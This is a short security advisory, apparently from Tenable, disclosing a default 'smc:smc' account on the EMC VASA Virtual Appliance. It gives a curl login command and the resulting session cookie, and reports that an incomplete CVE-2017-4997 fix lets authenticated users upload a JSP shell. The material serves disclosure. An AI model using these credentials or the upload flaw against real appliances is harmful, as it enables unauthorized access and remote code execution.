[R2] EMC VASA Virtual Appliance Default Creds and Arbitrary File Upload

While researching CVE-2017-4997, Tenable discovered the default account "smc:smc" in the EMC VASA Virtual Appliance SE web application. We also quickly discovered that this account is not authorized to access the web interface:

2017-07-27 20:44:01,237 INFO  [em.bp.SECURITY] (default task-14) com.emc.em.common.security.authentication.Authenticator:User C:aceeca79-53d7-49ee-bfb8-0d425579597f\smc has successfully logged in
2017-07-27 20:44:01,344 INFO  [com.emc.se.utils] (default task-14) smc User Not Authorized

However, if you read the error log closely you'll see the initial login process was successful. An attacker can use this account to login and obtain a valid session ID:

[user@host inp]$ curl --tlsv1.2 -ki -d "user=smc&passwd=smc" "https://:5480/SE/app"
HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: JSP/2.2
Set-Cookie: JSESSIONID=ubTvlGp-9jsCBy48a0GiQzW0Myly5BX9f2SaZoim.record; path=/SE; secure; HttpOnly
[...] 

The session ID is the cookie's JSESSIONID without the .hostname string. In the above example the hostname was record. Therefore the session ID is 9jsCBy48a0GiQzW0Myly5BX9f2SaZoim. With a valid session ID the attacker can perform many authenticated functions without interacting with the vApp Manager web interface.

Tenable further discovered that CVE-2017-4997 was not completely fixed. The "fix" did not stop authenticated users from uploading files to arbitrary locations. An attacker could login with the "smc" account and upload a JSP shell.